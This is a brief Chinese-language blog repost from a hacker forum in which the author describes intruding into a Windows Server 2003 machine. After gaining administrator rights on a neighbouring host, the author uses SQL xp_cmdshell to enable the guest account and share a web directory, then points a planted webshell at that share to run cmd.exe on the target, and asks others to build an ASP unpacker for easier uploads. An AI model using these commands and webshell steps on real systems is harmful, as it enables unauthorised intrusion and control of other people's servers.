I'n Blog 之萬象真藏

文章作者： pt007 （文章很簡潔，但做起來很困難）

最近在入侵Win2003時發現缺省情況下無法利用系統自帶的cmd.exe文件來執行系統命令，上傳cmd.exe文件時因為文件太大而失敗，後來我通過一台相鄰機器的文件共享成功上傳了cmd.exe文件，具體過程如下：
我們已經獲得了相鄰機器（192.168.1.1）的管理員權限，利用SQL的xp_cmdshell命令執行以下的操作：
 net user guest /active:yes 打開guest用戶以允許文件共享的匿名訪問
 net share web=d:\web 將本機的WEB目錄共享

然後在目標機上的WEBSHELL上的shell路徑裡面輸入： \\192.168.1.1\web\cmd.exe


最後將上圖中的SHELL路徑改為c:\cmd.exe即可正常運行系統命令。

由於cmd.exe可以通過打包上傳到服務器，我建議哪位高手寫一個基於ASP的RAR解壓軟件來方便2003服務器下的上傳cmd.exe程序。

原文轉貼處 http://www.hackeroo.com/read.php?tid=646